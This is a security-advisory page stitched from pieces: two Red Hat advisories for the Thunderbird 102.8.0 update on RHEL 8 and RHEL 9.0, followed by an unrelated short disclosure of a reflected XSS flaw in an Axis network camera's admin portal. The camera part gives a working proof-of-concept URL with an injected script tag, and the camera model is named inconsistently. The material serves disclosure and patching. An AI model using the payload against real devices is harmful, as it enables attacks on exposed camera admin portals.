An update for thunderbird is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.8.0.

Security Fix(es):

* Mozilla: Arbitrary memory write via PKCS 12 in NSS (CVE-2023-0767)

* Mozilla: Content security policy leak in violation reports using iframes  
(CVE-2023-25728)

* Mozilla: Screen hijack via browser fullscreen mode (CVE-2023-25730)

* Mozilla: Potential use-after-free from compartment mismatch in  
SpiderMonkey (CVE-2023-25735)

* Mozilla: Invalid downcast in SVGUtils::SetupStrokeGeometry  
(CVE-2023-25737)

* Mozilla: Use-after-free in  
mozilla::dom::ScriptLoadContext::~ScriptLoadContext (CVE-2023-25739)

* Mozilla: Fullscreen notification not shown in Firefox Focus  
(CVE-2023-25743)

* Mozilla: Memory safety bugs fixed in Firefox 110 and Firefox ESR 102.8  
(CVE-2023-25744)

* Mozilla: Memory safety bugs fixed in Firefox ESR 102.8 (CVE-2023-25746)

* Mozilla: Extensions could have opened external schemes without user  
knowledge (CVE-2023-25729)

* Mozilla: Out of bounds memory write from EncodeInputStream  
(CVE-2023-25732)

* Mozilla: User Interface lockup with messages combining S/MIME and OpenPGP  
(CVE-2023-0616)

* Mozilla: Web Crypto ImportKey crashes tab (CVE-2023-25742)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2170374 - CVE-2023-25728 Mozilla: Content security policy leak in violation reports using iframes  
2170375 - CVE-2023-25730 Mozilla: Screen hijack via browser fullscreen mode  
2170376 - CVE-2023-25743 Mozilla: Fullscreen notification not shown in Firefox Focus  
2170377 - CVE-2023-0767 Mozilla: Arbitrary memory write via PKCS 12 in NSS  
2170378 - CVE-2023-25735 Mozilla: Potential use-after-free from compartment mismatch in SpiderMonkey  
2170379 - CVE-2023-25737 Mozilla: Invalid downcast in SVGUtils::SetupStrokeGeometry  
2170381 - CVE-2023-25739 Mozilla: Use-after-free in mozilla::dom::ScriptLoadContext::~ScriptLoadContext  
2170382 - CVE-2023-25729 Mozilla: Extensions could have opened external schemes without user knowledge  
2170383 - CVE-2023-25732 Mozilla: Out of bounds memory write from EncodeInputStream  
2170390 - CVE-2023-25742 Mozilla: Web Crypto ImportKey crashes tab  
2170391 - CVE-2023-25744 Mozilla: Memory safety bugs fixed in Firefox 110 and Firefox ESR 102.8  
2170402 - CVE-2023-25746 Mozilla: Memory safety bugs fixed in Firefox ESR 102.8  
2171397 - CVE-2023-0616 Mozilla: User Interface lockup with messages combining S/MIME and OpenPGP

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
thunderbird-102.8.0-2.el8_7.src.rpm

aarch64:  
thunderbird-102.8.0-2.el8_7.aarch64.rpm  
thunderbird-debuginfo-102.8.0-2.el8_7.aarch64.rpm  
thunderbird-debugsource-102.8.0-2.el8_7.aarch64.rpm

ppc64le:  
thunderbird-102.8.0-2.el8_7.ppc64le.rpm  
thunderbird-debuginfo-102.8.0-2.el8_7.ppc64le.rpm  
thunderbird-debugsource-102.8.0-2.el8_7.ppc64le.rpm

s390x:  
thunderbird-102.8.0-2.el8_7.s390x.rpm  
thunderbird-debuginfo-102.8.0-2.el8_7.s390x.rpm  
thunderbird-debugsource-102.8.0-2.el8_7.s390x.rpm

x86_64:  
thunderbird-102.8.0-2.el8_7.x86_64.rpm  
thunderbird-debuginfo-102.8.0-2.el8_7.x86_64.rpm  
thunderbird-debugsource-102.8.0-2.el8_7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-0616  
https://access.redhat.com/security/cve/CVE-2023-0767  
https://access.redhat.com/security/cve/CVE-2023-25728  
https://access.redhat.com/security/cve/CVE-2023-25729  
https://access.redhat.com/security/cve/CVE-2023-25730  
https://access.redhat.com/security/cve/CVE-2023-25732  
https://access.redhat.com/security/cve/CVE-2023-25735  
https://access.redhat.com/security/cve/CVE-2023-25737  
https://access.redhat.com/security/cve/CVE-2023-25739  
https://access.redhat.com/security/cve/CVE-2023-25742  
https://access.redhat.com/security/cve/CVE-2023-25743  
https://access.redhat.com/security/cve/CVE-2023-25744  
https://access.redhat.com/security/cve/CVE-2023-25746  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY/O7+tzjgjWX9erEAQjiMQ/+NF6WacFfMd9uGPOkNTyFzkWqiJ9i7T8E  
QAAxTadrnsJjh/4pGhCyEZK8eTtlrVnjd5FwutEtQ6Tqc/+PZsoU2g92yfPjb9D3  
7zjyBxFy3OMnxgrMS0A8+SVUjbvf2TRM0GihmSaOQeLcVt+jniAvLhpP7hrDfLV9  
coEiWLupxm2XiksdvTKiaY/FhjU/ywTPgqx4pHXHgsW3na1exsd4YDQimjzTU+oS  
XUszMbfF57X/W77VI/LJfgGEbSyY2iGDu56ucTKxuHUxKvCKMOzGy9XPURf4OSZt  
GpCSXEHIgv9rf7p76KDTX0OVdf6jPB85MZXwO0Uz9np8yOCi8NQYB/1/ZIfh8Qry  
hGTqPRkQaWO+Y4dDkStE4c0qtS9xHJpIJs2ULuC5ZRuhDcziMiCP0j0tkrK0BuC3  
hc1NwqEtL6oY38YNbVr0mc5FNCof1vcsCBkaaPuJeRFBEwTIxcELZUWAWcaSGaG2  
8ZzsNfVEQSDw72Inh3TnPlP9lJDbno9OvISgqS32JqKpwPfHnLyJtAyZBXqolw7D  
2X7ipGAuDC8vQ4okXsODKI13yRZMfZOwL062isv/ltopi2YVfkKoZRXHlac5FxGu  
Lk9Ffo8UYtwtOPaopzvJl4+qqsL6E5qKgMgp/pvmwxTTOwdGmW1QQtPIyEfZfN+6  
A2s+9PUJXqY=GdLD  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0821-01

Red Hat Security Advisory 2023-0823-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.8.0. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2023:0823-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0823  
Issue date:        2023-02-20  
CVE Names:         CVE-2023-0616 CVE-2023-0767 CVE-2023-25728  
                   CVE-2023-25729 CVE-2023-25730 CVE-2023-25732  
                   CVE-2023-25735 CVE-2023-25737 CVE-2023-25739  
                   CVE-2023-25742 CVE-2023-25743 CVE-2023-25744  
                   CVE-2023-25746  
====================================================================  
1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 9.0  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.9.0) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.8.0.

Security Fix(es):

* Mozilla: Arbitrary memory write via PKCS 12 in NSS (CVE-2023-0767)

* Mozilla: Content security policy leak in violation reports using iframes  
(CVE-2023-25728)

* Mozilla: Screen hijack via browser fullscreen mode (CVE-2023-25730)

* Mozilla: Potential use-after-free from compartment mismatch in  
SpiderMonkey (CVE-2023-25735)

* Mozilla: Invalid downcast in SVGUtils::SetupStrokeGeometry  
(CVE-2023-25737)

* Mozilla: Use-after-free in  
mozilla::dom::ScriptLoadContext::~ScriptLoadContext (CVE-2023-25739)

* Mozilla: Fullscreen notification not shown in Firefox Focus  
(CVE-2023-25743)

* Mozilla: Memory safety bugs fixed in Firefox 110 and Firefox ESR 102.8  
(CVE-2023-25744)

* Mozilla: Memory safety bugs fixed in Firefox ESR 102.8 (CVE-2023-25746)

* Mozilla: Extensions could have opened external schemes without user  
knowledge (CVE-2023-25729)

* Mozilla: Out of bounds memory write from EncodeInputStream  
(CVE-2023-25732)

* Mozilla: User Interface lockup with messages combining S/MIME and OpenPGP  
(CVE-2023-0616)

* Mozilla: Web Crypto ImportKey crashes tab (CVE-2023-25742)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2170374 - CVE-2023-25728 Mozilla: Content security policy leak in violation reports using iframes  
2170375 - CVE-2023-25730 Mozilla: Screen hijack via browser fullscreen mode  
2170376 - CVE-2023-25743 Mozilla: Fullscreen notification not shown in Firefox Focus  
2170377 - CVE-2023-0767 Mozilla: Arbitrary memory write via PKCS 12 in NSS  
2170378 - CVE-2023-25735 Mozilla: Potential use-after-free from compartment mismatch in SpiderMonkey  
2170379 - CVE-2023-25737 Mozilla: Invalid downcast in SVGUtils::SetupStrokeGeometry  
2170381 - CVE-2023-25739 Mozilla: Use-after-free in mozilla::dom::ScriptLoadContext::~ScriptLoadContext  
2170382 - CVE-2023-25729 Mozilla: Extensions could have opened external schemes without user knowledge  
2170383 - CVE-2023-25732 Mozilla: Out of bounds memory write from EncodeInputStream  
2170390 - CVE-2023-25742 Mozilla: Web Crypto ImportKey crashes tab  
2170391 - CVE-2023-25744 Mozilla: Memory safety bugs fixed in Firefox 110 and Firefox ESR 102.8  
2170402 - CVE-2023-25746 Mozilla: Memory safety bugs fixed in Firefox ESR 102.8  
2171397 - CVE-2023-0616 Mozilla: User Interface lockup with messages combining S/MIME and OpenPGP

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.9.0):

Source:  
thunderbird-102.8.0-2.el9_0.src.rpm

aarch64:  
thunderbird-102.8.0-2.el9_0.aarch64.rpm  
thunderbird-debuginfo-102.8.0-2.el9_0.aarch64.rpm  
thunderbird-debugsource-102.8.0-2.el9_0.aarch64.rpm

ppc64le:  
thunderbird-102.8.0-2.el9_0.ppc64le.rpm  
thunderbird-debuginfo-102.8.0-2.el9_0.ppc64le.rpm  
thunderbird-debugsource-102.8.0-2.el9_0.ppc64le.rpm

s390x:  
thunderbird-102.8.0-2.el9_0.s390x.rpm  
thunderbird-debuginfo-102.8.0-2.el9_0.s390x.rpm  
thunderbird-debugsource-102.8.0-2.el9_0.s390x.rpm

x86_64:  
thunderbird-102.8.0-2.el9_0.x86_64.rpm  
thunderbird-debuginfo-102.8.0-2.el9_0.x86_64.rpm  
thunderbird-debugsource-102.8.0-2.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-0616  
https://access.redhat.com/security/cve/CVE-2023-0767  
https://access.redhat.com/security/cve/CVE-2023-25728  
https://access.redhat.com/security/cve/CVE-2023-25729  
https://access.redhat.com/security/cve/CVE-2023-25730  
https://access.redhat.com/security/cve/CVE-2023-25732  
https://access.redhat.com/security/cve/CVE-2023-25735  
https://access.redhat.com/security/cve/CVE-2023-25737  
https://access.redhat.com/security/cve/CVE-2023-25739  
https://access.redhat.com/security/cve/CVE-2023-25742  
https://access.redhat.com/security/cve/CVE-2023-25743  
https://access.redhat.com/security/cve/CVE-2023-25744  
https://access.redhat.com/security/cve/CVE-2023-25746  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY/O789zjgjWX9erEAQjE2A/+Mxy1gIfafYQkbmOvTX6kZYjLl9vv+Pss  
hAPyX3kUAwzGz+KCQljNVrH1b0aaDv7Etn5OXDzRJsKpVhRjVHEwT+IxGII/vYFT  
KQuCBJrS+OLtndHpg3mDafQiE6ylyhAl8oXAdF8XZ0GJTpIUoS+4GZ2o8cCKmz9n  
c2jC407a2Z5k44G2YsBEuxDjnBPq89ElPJrDxd8AQKpYl377M6diA02a9u33L0sw  
jOUUK4uo9PZoVXvWYhFBzSRLwXmWEzggyAndNndrsB+hsiOHSNlduT+8MarNEZc2  
aH2UAVyerrKkW4nr6JLugj1hNAe219QCHAjGWt0i9n7JslYulrVq5+B7NIIFSWxO  
PAM4dNWESzMP25yAzJO9WL1IbTzUw5R6s9Qct1IjmZUEWoyO2GTip0zWoWBYd8Qe  
LQtqj3Acud/KloXZ+HpzmxNVC6Cq1iUqTXlX8NTMEKMC8/qSF6phq0aPuIvKOdds  
Bmn2i3sIHgV9aaP0lNDpDOyT8QUKsb6NkFgcmH+rrJygkJ4X01OP7aaOFmdIpkNx  
g0XtU39/2EBoQQGXxazFDzWChIrgQ4Rh1ma5d13hSwng0/ezvHsPvu0Y1HkQExUy  
RH8eFHXh6DVIrsCnQAxTX8hB1JsHBbW/ZBttPb0PouD16RoasdCFG5nguGHEs7FH  
TjY+JIz8EoM=fJhO  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0823-01

A Vulnerability was discovered in Axis 207W network camera. There is a reflected XSS vulnerability in the web administration portal, which allows an attacker to execute arbitrary JavaScript via URL.

**# Axis 207W Network Camera XSS Vulnerability**

I have found a vulnerability in the Axis 207W Network Camera running firmware.

Reflected XSS in web administration portal in Axis 2100 Network Camera allows attacker to execute arbitrary javascript via URL.

POC Verified on Firefox 78.0:

    http://xxx.xxx.xxx.xxx/view/view.shtml?id=461&imagePath=%3C%2FsCrIpT%3E%3CsCrIpT%3Eipbtjgpgcc%3C%2FsCrIpT%3E&size=1
    

xss Vulnerability

Tag

#firefox